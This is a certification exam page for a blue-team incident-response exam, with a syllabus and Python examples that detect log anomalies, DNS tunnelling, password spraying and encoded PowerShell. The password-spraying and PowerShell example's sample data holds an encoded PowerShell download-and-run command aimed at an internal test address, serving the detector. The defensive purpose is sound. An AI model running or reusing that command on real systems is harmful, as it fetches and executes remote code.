Certified Blue Teamer
(CBTeamer)

The Certified Blue Teamer (CBTeamer) exam is an intermediate-level blue teaming and incident response exam designed to assess a candidate’s ability to investigate, correlate, and interpret a multi-stage intrusion within a modern Windows Active Directory enterprise. The exam simulates a realistic compromise against a mid-sized organization, where the attacker begins by exploiting public-facing infrastructure and gradually pivots deeper into the internal network.

Note: The exam details will be sent to you on/before 1st December, 2025.

  • Practical
  • 5 Hours
  • Online
  • On-demand
  • Real world blue teaming scenarios

£250

Who should take this exam?

The CBTeamer exam is designed for DFIR analysts, blue teamers, SOC professionals, detection engineers, and anyone seeking to demonstrate competence in real-world intrusion investigation. It is also highly suitable for pentesters and red teamers who want to understand how defenders analyze and investigate multi-stage attacks by examining network captures, Windows event logs, Sysmon telemetry, Active Directory artifacts, and memory forensics.

What is the format of the exam?

CBTeamer is an intense 5-hour practical exam that tests deep technical analysis skills. Candidates must investigate multi-stage attacks, correlate artifacts, and identify adversary activity across the intrusion lifecycle. The exam can be taken online, anytime (on-demand), and from anywhere. Candidates are given a dedicated analysis instance with a SIEM and all required logs, PCAPs, and memory images, and must connect to the exam VPN server to access the environment.

Note: While all our other professional exams are 4-hour exams, CBTeamer is allowed an extra hour.

What is the pass criteria for the exam?

The pass criteria are as follows:

  • Candidates scoring over 60% will be deemed to have passed the exam.
  • Candidates scoring over 75% will be deemed to have passed with merit.

What is the experience needed to take the exam?

This is an intermediate-level exam. Candidates should have solid, hands-on experience in Windows security monitoring, incident response, and enterprise intrusion analysis. They are expected to understand topics such as Active Directory telemetry, Kerberos authentication flows, network traffic interpretation, log correlation, and host-based forensic investigation. Candidates should be comfortable analyzing multi-stage attacks, identifying lateral movement, detecting credential abuse, and reconstructing adversary actions using logs, memory artifacts, and SIEM data.

Note: As this is an intermediate-level exam, a minimum of two years of professional blue teaming experience is recommended.

What will the candidates get?

On completing the exam, each candidate will receive:

  • A certificate stating their pass/fail and merit status.
  • A certificate number, printed on the certificate, which can be used for independent verification.

What is the exam retake policy?

Candidates who fail the exam are allowed 1 free exam retake as part of the exam fee.

What are the benefits of this exam?

This exam will allow candidates to demonstrate their capability in real-world intrusion investigation, including log analysis, correlation of multi-stage attacks, forensic triage, and reconstruction of adversary actions inside an enterprise environment. It provides strong credibility for roles in DFIR, SOC operations, and incident response, as well as for red teamers who want to understand how defenders trace and attribute attacker activity.

This exam helps professionals stand out in the cybersecurity field by validating their ability to analyze compromises using authentic evidence, interpret attacker tradecraft, and produce accurate investigative findings using industry-standard tools and processes.

How long is the certificate valid for?

The certificate does not have an expiration date. However, it will include the exam version and issue date. As the exam is periodically updated, candidates are encouraged to retake newer versions to stay current with modern blue team methodologies.

Will you provide any training that can be taken before the exam?

Being an independent certifying authority, we do not provide any training for the exam. Candidates should carefully go over each topic listed in the syllabus and make sure they have adequate understanding, required experience and practical knowledge of these topics. Further, the following independent resources can be utilised to prepare for the exams.

Learning Resources

Exam Syllabus

SECURITY OPERATIONS CENTER (SOC) FUNDAMENTALS

SOC Architecture & Operations

  • Understanding SOC organizational structure with Tier 1, 2, 3 analyst roles and responsibilities
  • SOC analyst workflows including threat models and key tools like SIEM and SOAR
  • Shift operations, handover procedures, and effective case management using ticketing systems

Alert Management

  • Triaging alerts to distinguish false positives from true threats requiring escalation
  • Correlating multiple alerts across systems to identify coordinated attack patterns
  • Documenting findings clearly for team collaboration and future reference

SECURITY INFORMATION & EVENT MANAGEMENT (SIEM)

SIEM Fundamentals

  • Understanding how SIEM collects, centralizes, and analyzes log data from network devices, endpoints, and systems
  • Configuring log sources and understanding data normalization for effective analysis
  • Using common detection rules from community or vendor sources to enhance threat detection

Basic SIEM Queries

  • Writing search queries in SPL (Splunk) or KQL (Microsoft Sentinel/Defender)
  • Filtering and searching logs to investigate specific events or time periods
  • Creating saved searches for recurring investigation needs

Detection Rule Creation

  • Crafting high-quality detection rules to identify suspicious activities
  • Baselining normal user and application behavior to spot deviations indicating potential threats
  • Tuning rules to reduce false positives while maintaining security coverage

Dashboards & Visualization

  • Creating operational dashboards to monitor real-time security events
  • Building visualizations (charts, graphs, timelines) to communicate security metrics
  • Configuring alerts and notifications for critical security events

MITRE ATT&CK FRAMEWORK

Framework Basics

  • Understanding ATT&CK as a globally recognized knowledge base of adversary tactics and techniques based on real-world observations
  • Navigating the ATT&CK Enterprise Matrix to understand its 14 tactics and their associated techniques
  • Using ATT&CK Navigator to visualize and track threat coverage

Practical Application

  • Mapping detected security events to specific ATT&CK techniques during investigations
  • Identifying which techniques your organization can detect vs. potential blind spots
  • Using ATT&CK to communicate threats in a standardized language across teams

THREAT HUNTING FUNDAMENTALS

Hunting Methodologies

  • Hypothesis-driven hunting where you formulate theories about potential threats and investigate them
  • IOC-based hunting using known indicators of compromise from threat intelligence
  • Understanding when to hunt proactively vs. reactively after an incident

Basic Hunting Techniques

  • Baselining to understand normal behavior in your environment and identify anomalies
  • Searching for suspicious processes, network connections, and user behaviors
  • Using endpoint and network data to track potential attacker activity

Hunt Execution

  • Starting with a clear hypothesis or question about potential threats
  • Querying logs and security tools to test your hypothesis
  • Documenting findings and creating new detections based on discoveries

INCIDENT RESPONSE BASICS

IR Process

  • Following the incident response lifecycle: preparation, detection, containment, eradication, recovery, and lessons learned
  • Determining incident severity and business impact for proper prioritization
  • Communicating effectively with stakeholders during active incidents

Evidence Collection

  • Preserving digital evidence while maintaining chain of custody for potential legal needs
  • Collecting volatile data (memory, network connections) before non-volatile data (disk)
  • Using forensic tools to create images without altering original evidence

Containment & Recovery

  • Implementing short-term containment (isolate systems) and long-term fixes (patching vulnerabilities)
  • Eradicating threats completely from the environment to prevent re-infection
  • Documenting lessons learned to improve future incident response

DIGITAL FORENSICS ESSENTIALS

Windows Forensics

  • Analyzing Windows Event Logs (Security, System, Application) for suspicious activity
  • Investigating registry artifacts, prefetch files, and browser history for evidence
  • Understanding Windows file system artifacts like MFT, USN Journal, and ShimCache

Linux Forensics

  • Examining system logs in /var/log/ directory (auth.log, syslog, secure)
  • Analyzing bash history and command-line artifacts to trace attacker actions
  • Investigating authentication logs (wtmp, btmp) for unauthorized access

Memory Analysis Basics

  • Understanding why memory forensics is critical for detecting fileless malware
  • Using Volatility to analyze memory dumps for running processes and network connections
  • Identifying malicious code injection and rootkits hiding in memory

Timeline Analysis

  • Creating chronological timelines of events across multiple log sources
  • Correlating file system, registry, and log timestamps to reconstruct attack sequences
  • Using timelines to identify patient zero and full scope of compromise
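
The part of timeline work that most often goes wrong in practice is timestamp normalisation: every source stamps time differently, and sorting wall-clock strings silently reorders events. The following Python is an added illustration written for this page, not exam material or tooling from the certifying body. It merges three constructed log lines (an Apache access log entry with a +0100 offset, a Windows Security CSV export in UTC, and a classic syslog line that carries neither year nor zone) into one UTC timeline. The CSV column layout and the syslog host's zone are assumptions for the example.

```python
import re
from datetime import datetime, timezone

# Constructed sample lines from three sources (not real logs). The Apache
# line is stamped in local time with a +0100 offset, the Windows export is
# already UTC, and the syslog line has neither a year nor a zone.
APACHE_LINES = [
    '203.0.113.10 - - [10/Jan/2025:03:14:01 +0100] "POST /login HTTP/1.1" 200 512',
]
# Assumed CSV layout: TimeCreated,EventID,Computer,User,IpAddress
WINDOWS_CSV_LINES = [
    "2025-01-10T02:15:30Z,4624,WEB01,carol,10.20.30.40",
]
AUTH_LOG_LINES = [
    "Jan 10 02:20:05 jump01 sshd[4242]: Accepted publickey for carol from 10.20.30.40 port 51022 ssh2",
]


def parse_apache(line):
    """Combined-log-format line -> UTC event; %z consumes the +0100 offset."""
    m = re.search(r"\[(\d{2}/\w{3}/\d{4}:\d{2}:\d{2}:\d{2} [+-]\d{4})\]", line)
    ts = datetime.strptime(m.group(1), "%d/%b/%Y:%H:%M:%S %z")
    request = line.split('"')[1]
    return {"ts": ts.astimezone(timezone.utc), "source": "apache", "event": request}


def parse_windows_csv(line):
    """Constructed CSV export; the trailing Z marks the value as UTC."""
    ts_s, event_id, host, user, ip = line.split(",")
    ts = datetime.strptime(ts_s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return {"ts": ts, "source": "windows", "event": f"{event_id} {user}@{host} from {ip}"}


def parse_auth_log(line, year, tz=timezone.utc):
    """Classic syslog: year and zone are not in the line and must be supplied
    from the host's configuration (assumed UTC here)."""
    m = re.match(r"(\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) (\S+) (.*)", line)
    ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S").replace(tzinfo=tz)
    return {"ts": ts.astimezone(timezone.utc), "source": f"auth.log@{m.group(2)}", "event": m.group(3)}


def build_timeline(apache=APACHE_LINES, windows=WINDOWS_CSV_LINES, auth=AUTH_LOG_LINES, syslog_year=2025):
    """Normalise every source to tz-aware UTC, then sort. The first entry is
    the earliest observed activity, the starting point for a patient-zero hunt."""
    events = [parse_apache(l) for l in apache]
    events += [parse_windows_csv(l) for l in windows]
    events += [parse_auth_log(l, syslog_year) for l in auth]
    return sorted(events, key=lambda e: e["ts"])


def render(timeline):
    """One fixed-width line per event for a report appendix."""
    return [f"{e['ts'].strftime('%Y-%m-%dT%H:%M:%SZ')} {e['source']:<16} {e['event']}" for e in timeline]


if __name__ == "__main__":
    for row in render(build_timeline()):
        print(row)
```

Read as raw text, the Apache request (03:14:01) looks like it happened after the Windows logon (02:15:30); once the offset is applied it is the first event at 02:14:01Z, which changes the story from "logon then web activity" to "web login then lateral logon". Sorting before normalising would have hidden that.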

PHISHING ANALYSIS

Email Header Analysis

  • Analyzing email headers to verify sender authenticity and identify spoofing attempts
  • Checking SPF, DKIM, and DMARC records to validate legitimate email sources
  • Identifying discrepancies between displayed sender and actual originating server

Malicious Content Detection

  • Safely analyzing suspicious URLs using sandboxes and defanging techniques
  • Identifying malicious attachments through static analysis without executing them
  • Recognizing social engineering tactics and business email compromise patterns

MALWARE ANALYSIS FUNDAMENTALS

Static Analysis Basics

  • Examining malware files without executing them to identify capabilities and IOCs
  • Using tools to check file hashes, extract readable strings, and identify packer usage
  • Analyzing portable executable (PE) structure to understand imports and resources

Dynamic Analysis Basics

  • Safely executing malware in sandboxes to observe runtime behavior
  • Monitoring process creation, file modifications, and registry changes during execution
  • Capturing network traffic generated by malware to identify command-and-control servers

IOC Extraction

  • Documenting file hashes (MD5, SHA256) for threat intelligence and detection
  • Identifying malicious IP addresses, domains, and URLs contacted by malware
  • Extracting file paths, registry keys, and mutexes for creating detection signatures

NETWORK SECURITY MONITORING

Network Traffic Analysis

  • Using Wireshark or tcpdump to capture and analyze network packets
  • Understanding common protocols (HTTP, DNS, SMB) and identifying abnormal usage
  • Detecting suspicious traffic patterns like data exfiltration or lateral movement

Intrusion Detection Systems

  • Deploying and monitoring Snort or Suricata for network-based threat detection
  • Understanding signature-based detection vs. anomaly-based detection approaches
  • Analyzing IDS alerts, investigating triggered rules, and reducing false positives

Network Artifacts

  • Analyzing DNS logs to detect tunneling, DGA domains, and command-and-control traffic
  • Investigating proxy logs for malicious downloads and suspicious web access patterns
  • Using NetFlow data to understand traffic patterns and detect anomalies
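
DNS tunnelling and DGA traffic look different in the same log: tunnelling shows as a stream of unique, very long first labels under one parent domain, DGA as lookups for short-lived second-level domains whose names are close to random. The Python below is an added example written for this page, not material from the exam or the certifying body. It runs both checks over a constructed query log (all hosts and domains invented); the thresholds and the "last two labels" shortcut for the registered domain are assumptions for the example, noted in the comments.

```python
import math
from collections import Counter, defaultdict

# Constructed DNS query log, one query per line:
#   <utc time> <client ip> <qtype> <qname>
# Not real data. Clients .41 is normal, .40 is tunnelling, .42 is a DGA beacon.
SAMPLE_DNS_LOG = """\
2025-01-10T02:20:00Z 10.20.30.41 A www.example.com
2025-01-10T02:20:01Z 10.20.30.41 A cdn.example.net
2025-01-10T02:20:05Z 10.20.30.40 TXT 6a7f3c9e1b2d4f5a6c7e8091a2b3c4d5e6f7a8b9c0d1e2f3.t.evil-example.org
2025-01-10T02:20:06Z 10.20.30.40 TXT 0f1e2d3c4b5a69788796a5b4c3d2e1f00112233445566778.t.evil-example.org
2025-01-10T02:20:07Z 10.20.30.40 TXT 99aabbccddeeff00112233445566778899aabbccddeeff00.t.evil-example.org
2025-01-10T02:21:00Z 10.20.30.42 A xk3qz7vplm2wd.com
2025-01-10T02:21:01Z 10.20.30.42 A q8rtyb2nfh4sj.net
2025-01-10T02:22:00Z 10.20.30.41 A mail.example.com
"""


def parse_dns_log(text):
    records = []
    for line in text.splitlines():
        if line.strip():
            ts, client, qtype, qname = line.split()
            records.append({"ts": ts, "client": client, "qtype": qtype,
                            "qname": qname.lower().rstrip(".")})
    return records


def shannon_entropy(s):
    """Bits per character. log2(26) ~ 4.7 is the ceiling for lowercase letters;
    English words usually sit well under 3.5."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def registered_domain(qname):
    # Simplification for the example: last two labels. Production code should
    # use the Public Suffix List so that host.example.co.uk is handled correctly.
    return ".".join(qname.split(".")[-2:])


def detect_tunneling(records, min_unique=3, min_label_len=30):
    """Parent domains receiving many distinct, long first labels. Tunnels
    encode data in the label, so each query is unique and near the 63-byte
    label limit. Thresholds are illustrative."""
    first_labels = defaultdict(set)
    for r in records:
        labels = r["qname"].split(".")
        if len(labels) > 2:
            first_labels[registered_domain(r["qname"])].add(labels[0])
    flagged = {}
    for domain, labels in first_labels.items():
        mean_len = sum(map(len, labels)) / len(labels)
        if len(labels) >= min_unique and mean_len >= min_label_len:
            flagged[domain] = {"unique_subdomains": len(labels), "mean_label_len": round(mean_len, 1)}
    return flagged


def detect_dga(records, min_entropy=3.5, min_len=12):
    """Registered domains whose second-level label is long and high-entropy.
    Expect false positives on CDN and tracking hosts; pair with NXDOMAIN
    rate and domain age before alerting."""
    flagged = set()
    for r in records:
        domain = registered_domain(r["qname"])
        sld = domain.split(".")[0]
        if len(sld) >= min_len and shannon_entropy(sld) >= min_entropy:
            flagged.add(domain)
    return sorted(flagged)


if __name__ == "__main__":
    recs = parse_dns_log(SAMPLE_DNS_LOG)
    print("tunneling:", detect_tunneling(recs))
    print("dga:", detect_dga(recs))
```

Neither check is a verdict on its own. Tunnelling is confirmed by volume per client and by the ratio of TXT/NULL queries to A queries; DGA candidates are confirmed when the same client resolves many such names and most return NXDOMAIN.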

THREAT INTELLIGENCE BASICS

Intelligence Fundamentals

  • Understanding tactical intelligence (IOCs) vs. strategic intelligence (threat actor trends)
  • Following the intelligence lifecycle: collection, processing, analysis, dissemination

Open Source Intelligence (OSINT)

  • Using public sources like VirusTotal, AlienVault OTX, and abuse.ch for threat data
  • Investigating suspicious domains, IPs, and file hashes through OSINT platforms
  • Monitoring security blogs, vendor reports, and Twitter for emerging threats

LOG ANALYSIS

Common Log Sources

  • Understanding Windows Event Logs and key event IDs for security monitoring
  • Analyzing authentication logs (successful/failed logins, account lockouts)
  • Reviewing web server logs (Apache/IIS/nginx) for web application attacks

Log Correlation

  • Correlating logs from different sources to identify broader attack patterns
  • Linking failed login attempts with subsequent successful access for compromise detection
  • Combining firewall, proxy, and endpoint logs to trace attacker lateral movement

Suspicious Pattern Detection

  • Identifying failed authentication patterns indicating brute force or password spraying
  • Detecting off-hours activity or access from unusual geographic locations
  • Finding PowerShell obfuscation, encoded commands, and suspicious script execution
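
Two of the correlations above, "many 4625 failures followed by a 4624 from the same source" and "PowerShell launched with an encoded command", are worth seeing in code because the naive versions of both are noisy: every user who mistypes a password once produces a fail-then-success pair, and not every long base64 string is an attacker payload. The Python below is an added example written for this page, not material from the exam or the certifying body. It runs over constructed Windows Security events (4625, 4624, 4688) in JSON-lines form; the field names follow the Security log's own names, but the records, accounts and addresses are invented, and the encoded PowerShell payload is generated inside the sample so the example stays self-consistent.

```python
import base64
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: Windows Security 4625/4624 logon events plus one 4688
# process-creation event, as JSON lines. Not real telemetry. 10.20.30.40
# sprays five accounts and lands on "carol"; 10.20.30.77 is a normal user
# who mistyped once. The encoded payload is built here, not hand-typed.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://10.20.30.40/a')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode()
SAMPLE_EVENTS = """\
{"TimeCreated": "2025-01-10T02:14:01Z", "EventID": 4625, "TargetUserName": "alice", "IpAddress": "10.20.30.40", "LogonType": 3}
{"TimeCreated": "2025-01-10T02:14:03Z", "EventID": 4625, "TargetUserName": "bob", "IpAddress": "10.20.30.40", "LogonType": 3}
{"TimeCreated": "2025-01-10T02:14:05Z", "EventID": 4625, "TargetUserName": "carol", "IpAddress": "10.20.30.40", "LogonType": 3}
{"TimeCreated": "2025-01-10T02:14:07Z", "EventID": 4625, "TargetUserName": "dave", "IpAddress": "10.20.30.40", "LogonType": 3}
{"TimeCreated": "2025-01-10T02:14:09Z", "EventID": 4625, "TargetUserName": "erin", "IpAddress": "10.20.30.40", "LogonType": 3}
{"TimeCreated": "2025-01-10T02:15:30Z", "EventID": 4624, "TargetUserName": "carol", "IpAddress": "10.20.30.40", "LogonType": 3}
{"TimeCreated": "2025-01-10T09:01:00Z", "EventID": 4625, "TargetUserName": "frank", "IpAddress": "10.20.30.77", "LogonType": 2}
{"TimeCreated": "2025-01-10T09:01:20Z", "EventID": 4624, "TargetUserName": "frank", "IpAddress": "10.20.30.77", "LogonType": 2}
{"TimeCreated": "2025-01-10T02:16:00Z", "EventID": 4688, "SubjectUserName": "carol", "CommandLine": "powershell.exe -nop -w hidden -enc __ENC__"}
""".replace("__ENC__", ENCODED)

# -EncodedCommand and its common abbreviations; the argument is base64 of UTF-16LE text.
ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def parse_events(text):
    events = []
    for line in text.splitlines():
        if line.strip():
            ev = json.loads(line)
            ev["ts"] = datetime.strptime(ev["TimeCreated"], "%Y-%m-%dT%H:%M:%SZ")
            events.append(ev)
    return sorted(events, key=lambda e: e["ts"])


def detect_password_spray(events, min_accounts=5, window=timedelta(minutes=10)):
    """Source IPs with 4625 failures against >= min_accounts distinct users
    inside a sliding window. Spraying is many users with few attempts each;
    brute force is one user with many attempts, which this does not flag."""
    failures = defaultdict(list)
    for e in events:
        if e["EventID"] == 4625:
            failures[e["IpAddress"]].append((e["ts"], e["TargetUserName"]))
    flagged = {}
    for ip, attempts in failures.items():
        for i, (start, _) in enumerate(attempts):
            users = {u for ts, u in attempts[i:] if ts - start <= window}
            if len(users) >= min_accounts:
                flagged[ip] = sorted(users)
                break
    return flagged


def detect_spray_then_success(events, sprayers):
    """A 4624 from a spraying IP for an account it previously failed against.
    Restricting to sprayers is what keeps frank's single typo out of the alert."""
    failed_pairs, hits = set(), []
    for e in events:
        if e.get("IpAddress") not in sprayers:
            continue
        key = (e["IpAddress"], e["TargetUserName"])
        if e["EventID"] == 4625:
            failed_pairs.add(key)
        elif e["EventID"] == 4624 and key in failed_pairs:
            hits.append({"ip": key[0], "user": key[1], "time": e["TimeCreated"]})
    return hits


def decode_encoded_powershell(command_line):
    """Decoded -EncodedCommand payload, or None if absent or not valid UTF-16LE base64."""
    m = ENC_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def find_encoded_powershell(events):
    hits = []
    for e in events:
        if e["EventID"] == 4688 and "powershell" in e.get("CommandLine", "").lower():
            decoded = decode_encoded_powershell(e["CommandLine"])
            if decoded:
                hits.append({"user": e["SubjectUserName"], "time": e["TimeCreated"], "decoded": decoded})
    return hits


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    sprayers = detect_password_spray(evs)
    print("spraying sources:", sprayers)
    print("compromised accounts:", detect_spray_then_success(evs, sprayers))
    print("encoded PowerShell:", find_encoded_powershell(evs))
```

Command-line fields in 4688 are only populated when process command-line auditing is enabled (or when Sysmon Event ID 1 is collected), so check the data source before concluding that no encoded commands ran.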

CLOUD SECURITY MONITORING

Cloud Logging

  • Collecting and analyzing CloudTrail (AWS), Azure Monitor, or GCP Cloud Logging
  • Understanding cloud-specific events like IAM changes, resource creation/deletion
  • Monitoring for misconfigurations, publicly exposed resources, and privilege escalation

Cloud Threat Detection

  • Detecting unusual API calls, unauthorized access attempts, and data exfiltration
  • Identifying cryptomining activity through abnormal resource consumption
  • Monitoring container and serverless environments for security issues

SECURITY DOCUMENTATION

Incident Reports

  • Writing clear, concise incident reports with timeline, impact, and actions taken
  • Including technical details, IOCs, and recommendations for future prevention
  • Tailoring reports for technical teams vs. executive stakeholders

Playbook Creation

  • Documenting step-by-step procedures for common incident types (phishing, malware, ransomware)
  • Creating decision trees and response workflows for consistent handling
  • Maintaining and updating playbooks based on lessons learned